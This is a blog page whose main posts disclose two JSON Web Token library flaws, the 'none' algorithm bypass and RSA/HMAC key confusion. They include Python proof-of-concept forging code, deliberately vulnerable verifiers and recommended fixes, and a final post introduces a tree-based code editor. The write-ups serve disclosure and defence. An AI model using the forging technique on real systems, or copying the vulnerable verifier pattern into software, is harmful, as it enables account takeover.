Tim's blog

programming, crypto, etc. in Waterloo, Ontario, Canada.

Critical vulnerabilities in JSON Web Token libraries

March 31, 2015

This article originally appeared as a guest post on Auth0’s blog. Many thanks to them for publishing it and for helping me track down library maintainers.

Recently, while reviewing the security of various JSON Web Token implementations, I found many libraries with critical vulnerabilities allowing attackers to bypass the verification step. The same two flaws were found across many implementations and languages, so I thought it would be helpful to write up exactly where the problems occur. I believe that a change to the standard could help prevent future vulnerabilities.

For those who are unfamiliar, JSON Web Token (JWT) is a standard for creating tokens that assert some number of claims. For example, a server could generate a token that has the claim “logged in as admin” and provide that to a client. The client could then use that token to prove that they are logged in as admin. The tokens are signed by the server’s key, so the server is able to verify that the token is legitimate.

JWTs generally have three parts: a header, a payload, and a signature. The header identifies which algorithm is used to generate the signature, and looks something like this:

header = '{"alg":"HS256","typ":"JWT"}'

HS256 indicates that this token is signed using HMAC-SHA256.

The payload contains the claims that we wish to make:

payload = '{"loggedInAs":"admin","iat":1422779638}'

As suggested in the JWT spec, we include a timestamp called iat, short for “issued at”.

The signature is calculated by base64url encoding the header and payload, concatenating them with a period as a separator, and computing an HMAC of the result with the server's key:

key = 'secretkey'
unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload)
signature = HMAC-SHA256(key, unsignedToken)

To put it all together, we base64url encode the signature, and join together the three parts using periods:

token = encodeBase64(header) + '.' + encodeBase64(payload) + '.' + encodeBase64(signature)

# token is now:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dnZWRJbkFzIjoiYWRtaW4iLCJpYXQiOjE0MjI3Nzk2Mzh9.gzSraSYS8EXBxLN_oWnFSRgCzcmJmMjLiuyu5CSpyHI
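For readers who want to run these steps, here is a minimal Python sketch using only the standard library. It assumes the compact header and payload strings shown above and unpadded base64url, as JWT uses. `b64url_encode` and `make_token` are illustrative helper names, not functions from any JWT library.

```python
import base64
import hashlib
import hmac


def b64url_encode(data: bytes) -> str:
    # JWT uses base64url with the trailing '=' padding removed.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def make_token(header: str, payload: str, key: bytes) -> str:
    # The HMAC is computed over "<encoded header>.<encoded payload>".
    unsigned_token = b64url_encode(header.encode()) + "." + b64url_encode(payload.encode())
    signature = hmac.new(key, unsigned_token.encode("ascii"), hashlib.sha256).digest()
    return unsigned_token + "." + b64url_encode(signature)


header = '{"alg":"HS256","typ":"JWT"}'
payload = '{"loggedInAs":"admin","iat":1422779638}'
token = make_token(header, payload, b"secretkey")
print(token)
```

The first two segments of the printed token match the example above, since they are just the base64url encodings of the header and payload; the third segment encodes the 32-byte HMAC-SHA256 output.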

Great. So, what’s wrong with that?

Well, let’s try to verify a token.

First, we need to determine what algorithm was used to generate the signature. No problem, there’s an alg field in the header that tells us just that.

But wait, we haven’t validated this token yet, which means that we haven’t validated the header. This puts us in an awkward position: in order to validate the token, we have to allow attackers to select which method we use to verify the signature.

This has disastrous implications for some implementations.

Meet the “none” algorithm

The none algorithm is a curious addition to JWT. It is intended to be used for situations where the integrity of the token has already been verified. Interestingly enough, it is one of only two algorithms that are mandatory to implement (the other being HS256).

Unfortunately, some libraries treated tokens signed with the none algorithm as a valid token with a verified signature. The result? Anyone can create their own “signed” tokens with whatever payload they want, allowing arbitrary account access on some systems.

Putting together such a token is easy. Modify the above example header to contain "alg": "none" instead of HS256. Make any desired changes to the payload. Use an empty signature (i.e. signature = "").
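The sketch below makes this concrete. `naive_verify` is a hypothetical, deliberately vulnerable verifier, not code from any particular library: it takes the algorithm from the unverified header and treats `none` with an empty signature as valid. The forged token is built exactly as described above, without the server's key.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Re-add the '=' padding that JWT strips before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def naive_verify(token: str, key: bytes) -> dict:
    # VULNERABLE: the algorithm comes from the attacker-controlled header.
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    if header["alg"] == "none":
        valid = signature_b64 == ""  # "unsigned" tokens are accepted as-is
    elif header["alg"] == "HS256":
        expected = hmac.new(key, signing_input, hashlib.sha256).digest()
        valid = hmac.compare_digest(expected, b64url_decode(signature_b64))
    else:
        raise ValueError("unsupported algorithm")
    if not valid:
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(payload_b64))


# The attacker never sees the server's key.
forged = (
    b64url_encode(b'{"alg":"none","typ":"JWT"}')
    + "."
    + b64url_encode(b'{"loggedInAs":"admin","iat":1422779638}')
    + "."  # empty signature
)
print(naive_verify(forged, key=b"secretkey"))
```

Although the caller passes a secret key, it is never consulted, and the forged admin payload comes back as if it had been verified.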

Most (hopefully all?) implementations now have a basic check to prevent this attack: if a secret key was provided, then token verification will fail for tokens using the none algorithm. This is a good idea, but it doesn’t solve the underlying problem: attackers control the choice of algorithm. Let’s keep digging.

RSA or HMAC?

The JWT spec also defines a number of asymmetric signing algorithms (based on RSA and ECDSA). With these algorithms, tokens are created and signed using a private key, but verified using a corresponding public key. This is pretty neat: if you publish the public key but keep the private key to yourself, only you can sign tokens, but anyone can check if a given token is correctly signed.

Most of the JWT libraries that I’ve looked at have an API like this:

# sometimes called "decode"
verify(string token, string verificationKey)
# returns payload if valid token, else throws an error

In systems using HMAC signatures, verificationKey will be the server’s secret signing key (since HMAC uses the same key for signing and verifying):

verify(clientToken, serverHMACSecretKey)

In systems using an asymmetric algorithm, verificationKey will be the public key against which the token should be verified:

verify(clientToken, serverRSAPublicKey)

Unfortunately, an attacker can abuse this. If a server is expecting a token signed with RSA, but actually receives a token signed with HMAC, it will think the public key is actually an HMAC secret key.

How is this a disaster? HMAC secret keys are supposed to be kept private, while public keys are, well, public. This means that your typical ski-mask-wearing attacker has access to the public key, and can use this to forge a token that the server will accept.

Doing so is pretty straightforward. First, grab your favourite JWT library, and choose a payload for your token. Then, get the public key used on the server as a verification key (most likely in the text-based PEM format). Finally, sign your token using the PEM-formatted public key as an HMAC key. Essentially:

forgedToken = sign(tokenPayload, 'HS256', serverRSAPublicKey)

The trickiest part is making sure that serverRSAPublicKey is identical to the verification key used on the server. The strings must match exactly for the attack to work – exact same format, and no extra or missing line breaks.

End result? Anyone with knowledge of the public key can forge tokens that will pass verification.
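Here is a hedged sketch of the attack against another hypothetical verifier. This one already rejects `none` (the basic check described earlier), but it still lets the header decide how `verification_key` is used. Python's standard library has no RSA support, so the RS256 branch is left unimplemented; the attack never reaches it. `SERVER_RSA_PUBLIC_KEY` is a placeholder string standing in for a real PEM-encoded key, which is enough here because HMAC treats the key as opaque bytes.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def naive_verify(token: str, verification_key: str) -> dict:
    # Still VULNERABLE: "none" is rejected, but the header picks how the key is used.
    header_b64, payload_b64, signature_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64))["alg"]
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    if alg == "none":
        raise ValueError("'none' rejected because a key was supplied")
    if alg == "HS256":
        # The "public key" string is silently used as an HMAC secret.
        expected = hmac.new(verification_key.encode(), signing_input, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
            raise ValueError("invalid signature")
    elif alg == "RS256":
        raise NotImplementedError("RSA verification omitted from this sketch")
    else:
        raise ValueError("unsupported algorithm")
    return json.loads(b64url_decode(payload_b64))


def forge_hs256(payload: bytes, public_key_pem: str) -> str:
    # Attacker signs with HS256, using the published PEM text as the HMAC key.
    unsigned = b64url_encode(b'{"alg":"HS256","typ":"JWT"}') + "." + b64url_encode(payload)
    sig = hmac.new(public_key_pem.encode(), unsigned.encode("ascii"), hashlib.sha256).digest()
    return unsigned + "." + b64url_encode(sig)


# Placeholder standing in for the server's published RSA public key (not a real key).
SERVER_RSA_PUBLIC_KEY = (
    "-----BEGIN PUBLIC KEY-----\n"
    "placeholder-public-key-material\n"
    "-----END PUBLIC KEY-----\n"
)

forged = forge_hs256(b'{"loggedInAs":"admin"}', SERVER_RSA_PUBLIC_KEY)
print(naive_verify(forged, SERVER_RSA_PUBLIC_KEY))  # accepted
```

Stripping even the trailing newline from the key passed to `naive_verify` makes the forged signature fail, which is why the attacker has to reproduce the server's key string exactly.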

How can libraries fix this?

I suggest that JWT libraries add an algorithm parameter to their verification function:

verify(string token, string algorithm, string verificationKey)

The server should already know what algorithm it uses to sign tokens, and it’s not safe to allow attackers to provide this value.
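A minimal Python sketch of such a `verify`, assuming HMAC-SHA256 is the only algorithm this server uses (other algorithms are deliberately left unimplemented). The header's `alg` is consulted only to confirm it equals the caller's choice, so neither a `none` token nor an HS256 token presented to a server expecting RS256 gets past that comparison.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Restore the '=' padding that JWT strips.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def verify(token: str, algorithm: str, verification_key: bytes) -> dict:
    # The caller, not the token, decides which algorithm applies.
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    alg = header.get("alg") if isinstance(header, dict) else None
    if alg != algorithm:
        # The header's alg is only compared, never used to choose a method.
        raise ValueError("unexpected algorithm: %r" % (alg,))
    if algorithm != "HS256":
        raise NotImplementedError("this sketch only implements HS256")
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    expected = hmac.new(verification_key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(payload_b64))


# A token the server signed itself with HS256 verifies normally.
unsigned = b64url_encode(b'{"alg":"HS256","typ":"JWT"}') + "." + b64url_encode(b'{"loggedInAs":"admin"}')
good = unsigned + "." + b64url_encode(hmac.new(b"secretkey", unsigned.encode("ascii"), hashlib.sha256).digest())
print(verify(good, "HS256", b"secretkey"))

# A forged "none" token is rejected before any signature logic runs.
forged = b64url_encode(b'{"alg":"none"}') + "." + b64url_encode(b'{"loggedInAs":"admin"}') + "."
try:
    verify(forged, "HS256", b"secretkey")
except ValueError as err:
    print("rejected:", err)
```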

Some might argue that some servers need to support more than one algorithm for compatibility reasons. In this case, a separate key can (and should) be used for each supported algorithm. JWT conveniently provides a “key ID” field (kid) for exactly this purpose. Since servers can use the key ID to look up the key and its corresponding algorithm, attackers are no longer able to control the manner in which a key is used for verification. In any case, I don’t think JWT libraries should even look at the alg field in the header, except maybe to check that it matches the expected algorithm.
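One way to apply this, sketched under assumptions: the server keeps a table that binds each key ID to exactly one algorithm and key, and uses the header's `kid` only to look up that entry. The key IDs, secrets, and the `sign` and `verify_with_kid` helpers below are hypothetical, and only HMAC algorithms are implemented so the sketch stays within Python's standard library.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


# Hypothetical key table: each key ID is bound to exactly one algorithm and key.
KEYS = {
    "hmac-2015": ("HS256", b"secretkey"),
    "hmac-legacy": ("HS512", b"another-secret"),
}
HASHES = {"HS256": hashlib.sha256, "HS512": hashlib.sha512}


def sign(payload: bytes, kid: str) -> str:
    algorithm, key = KEYS[kid]
    header = json.dumps({"alg": algorithm, "kid": kid}).encode()
    unsigned = b64url_encode(header) + "." + b64url_encode(payload)
    signature = hmac.new(key, unsigned.encode("ascii"), HASHES[algorithm]).digest()
    return unsigned + "." + b64url_encode(signature)


def verify_with_kid(token: str) -> dict:
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    kid = header.get("kid") if isinstance(header, dict) else None
    # The kid only selects a server-side entry; unknown IDs are rejected.
    if not isinstance(kid, str) or kid not in KEYS:
        raise ValueError("unknown key ID")
    algorithm, key = KEYS[kid]
    if header.get("alg") != algorithm:
        raise ValueError("alg does not match the algorithm bound to this key")
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    expected = hmac.new(key, signing_input, HASHES[algorithm]).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(payload_b64))


print(verify_with_kid(sign(b'{"loggedInAs":"admin"}', "hmac-legacy")))
```

Because the algorithm comes from the table, a token that names a known `kid` but a different `alg` is rejected rather than verified with the wrong method.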

Anyone using a JWT implementation should make sure that tokens with a different signature type are guaranteed to be rejected. Some libraries have an optional mechanism for whitelisting or blacklisting algorithms; take advantage of it or you might end up at risk. Even better: have a policy of performing security audits on any open source libraries that you use to provide mission-critical functionality.

Improving the JWT/JWS standard

I would like to propose deprecating the header’s alg field. As we’ve seen here, its misuse can have a devastating impact on the security of a JWT/JWS implementation. As far as I can tell, key IDs provide an adequate alternative. This warrants a change to the spec: JWT libraries continue to be written with security flaws due to their dependence on alg.

JWT (and JOSE) present the opportunity to have a cross-platform suite of secure cryptography implementations. With these fixes, hopefully we’re a little bit closer to making that a reality.

The above work is licensed under a Creative Commons Attribution 4.0 International License.

What I don't like about JSON Web Tokens

February 25, 2015

Note: this post is here for historical reasons. I wrote an updated and expanded version here that you should read instead.

JSON Web Token (JWT) is a standard for creating tokens that assert some number of claims. For example, a server could generate a token that has the claim “logged in as admin” and provide that to a client. The client could then use that token to prove that they are logged in as admin. The tokens are signed by the server’s key, so the server is able to verify that the token is legitimate.

JWTs generally have three parts: a header, a payload, and a signature. The header identifies which algorithm is used to generate the signature, and looks something like this:

header = '{"alg":"HS256","typ":"JWT"}'

HS256 indicates that this token is signed using HMAC-SHA256.

The payload contains the claims that we wish to make:

payload = '{"loggedInAs":"admin","iat":1422779638}'

As suggested in the JWT spec, we include a timestamp called iat, short for “issued at”.

The signature is calculated by base64url encoding the header and payload, concatenating them with a period as a separator, and computing an HMAC of the result with the server's key:

key = 'secretkey'
unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload)
signature = HMAC-SHA256(key, unsignedToken)

To put it all together, we base64url encode the signature, and join together the three parts using periods:

token = encodeBase64(header) + '.' + encodeBase64(payload) + '.' + encodeBase64(signature)

# token is now:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dnZWRJbkFzIjoiYWRtaW4iLCJpYXQiOjE0MjI3Nzk2Mzh9.gzSraSYS8EXBxLN_oWnFSRgCzcmJmMjLiuyu5CSpyHI

Great. So, what’s wrong with that?

Well, let’s try to verify a token.

First, we need to determine what algorithm was used to generate the signature. No problem, there’s an alg field in the header that tells us just that.

But wait, we haven’t validated this token yet, which means that we haven’t validated the header. This puts us in an awkward position: in order to validate the token, we have to allow attackers to select which method we use to verify the signature.

Spec, meet implementation, meet disaster

So, what are the implications? Well, first of all, an attacker could turn your HMAC-SHA512 verification into an HMAC-SHA256 verification. Of course, that’s pretty boring, since HMAC-SHA256 is still plenty secure. Maybe in some cases, you could confuse an implementation into using an HMAC key as an RSA key…?

But let’s take another look at the spec. Oh, look, a signing algorithm called none! And it’s mandatory to implement! A bit of research shows that some JWT libraries will happily accept a token signed with the none algorithm and otherwise ignore the server’s secret key. End result: anyone can create their own “signed” tokens and claim to be logged in as “admin”.

What can we do about it?

Most of the JWT libraries that I’ve looked at have an API like this:

# sometimes called "decode"
verify(string token, string secretKey)
# returns payload if valid token, else throws an error

I suggest adding an algorithm parameter. The server should already know what algorithm it uses to sign tokens. Many libraries use HMAC-SHA256 as a default, which seems reasonable. In any case, JWT libraries should probably not even look at the alg field in the header, except maybe to check that it says what they expect it to say.

Anyone using a JWT implementation should read the code to make sure that any tokens signed with none are flat-out rejected. To be extra safe, make sure that any tokens you receive are signed using the algorithm you expect. Even better: have a policy of performing security audits on any open source libraries that you use to provide mission-critical functionality.
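If a library offers no way to pin the algorithm, a small pre-check can enforce the expectation before the token ever reaches it. `require_alg` below is a hypothetical helper sketched in Python; it reads only the unverified header, so it complements the library's signature check rather than replacing it.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def require_alg(token: str, expected_alg: str) -> str:
    """Reject tokens whose header names any algorithm other than expected_alg.

    Only the unverified header is inspected, so the token must still go through
    the library's own signature verification afterwards.
    """
    try:
        header = json.loads(b64url_decode(token.split(".")[0]))
    except ValueError as err:  # bad base64 padding, bad UTF-8, or bad JSON
        raise ValueError("malformed token header") from err
    if not isinstance(header, dict) or header.get("alg") != expected_alg:
        raise ValueError("token is not signed with " + expected_alg)
    return token


example_token = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"
    ".eyJsb2dnZWRJbkFzIjoiYWRtaW4iLCJpYXQiOjE0MjI3Nzk2Mzh9"
    ".gzSraSYS8EXBxLN_oWnFSRgCzcmJmMjLiuyu5CSpyHI"
)
require_alg(example_token, "HS256")  # passes; a "none" or "RS256" header would raise
```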

Where did things go wrong?

I’m honestly unsure why the standard specifies an alg field at all. I suspect the original intention may have been to allow the token to specify which key it was signed with, in case a server wanted to support both HMAC and RSA (for example). Alternatively, this may have been intended to provide cryptographic agility. It seems to me, though, that the “key ID” header field is quite adequate for both of these purposes, and less prone to errors in implementation.

The inclusion of a none algorithm is rather baffling. Presumably, it covers some use case, but I would have left it out – simpler protocols are easier to get right.

Introducing Substructed: a new way of editing code

October 03, 2013

I’d like to introduce you to a side project of mine. Substructed (demo) is a programming editor that takes advantage of the structured nature of code to allow advanced programmers to write and edit code more quickly.

Most editors today (such as Vim and Emacs) provide two dimensions for navigating code: down/up (rows) and left/right (columns). Substructed also provides two dimensions for navigation: forward/backward and in/out. Instead of navigating text, you navigate the syntax tree.

Consider, for example, the following JSON:

[
    "a",
    "b",
    "c",
    [
        "d",
        "e",
        "f"
    ],
    "g"
]

Substructed’s cursor looks essentially like a selection:

[
    "a",
    "b",
    "c",
    [
        "d",
        "e",
        "f"
    ],
    "g"
]

If we navigate forward one movement (which corresponds to the “j” key in Substructed’s command mode), the cursor moves to the next element of the array:

[
    "a",
    "b",
    "c",
    [
        "d",
        "e",
        "f"
    ],
    "g"
]

If we navigate inward one movement (which corresponds to the enter key in Substructed’s command mode), the cursor moves inside the inner array to the first element:

[
    "a",
    "b",
    "c",
    [
        "d",
        "e",
        "f"
    ],
    "g"
]
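Substructed's own implementation isn't shown in this post, so the following is only a hypothetical Python sketch of the idea: parse the JSON into nested lists and represent the cursor as a path of indices from the root. The function names are illustrative, and JSON objects (dicts) are not handled. In the usage lines, the cursor starts on "c" (a starting point chosen for illustration), so a forward movement selects the inner array and an inward movement then selects "d".

```python
import json

# The example document from above, parsed into nested Python lists.
DOC = json.loads('["a", "b", "c", ["d", "e", "f"], "g"]')


def node_at(tree, path):
    # Follow the list indices in `path` down from the root.
    for index in path:
        tree = tree[index]
    return tree


def forward(tree, path):
    # Move to the next sibling; stay put at the last element or at the root.
    if path and path[-1] + 1 < len(node_at(tree, path[:-1])):
        return path[:-1] + [path[-1] + 1]
    return path


def backward(tree, path):
    # Move to the previous sibling; stay put at the first element or the root.
    if path and path[-1] > 0:
        return path[:-1] + [path[-1] - 1]
    return path


def inward(tree, path):
    # Descend into a non-empty array, selecting its first element.
    node = node_at(tree, path)
    if isinstance(node, list) and node:
        return path + [0]
    return path


def outward(tree, path):
    # Select the enclosing array (the root has no parent).
    return path[:-1]


cursor = [2]                   # "c" is selected (an assumed starting point)
cursor = forward(DOC, cursor)  # now the inner array ["d", "e", "f"]
cursor = inward(DOC, cursor)   # now "d"
print(cursor, node_at(DOC, cursor))
```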

Today, I’m open sourcing a prototype of Substructed (demo) that can edit JSON. Very soon, I would like to begin implementing support for “real” languages (I’m currently considering Python). I’m making this prototype available now to collect feedback before moving forward.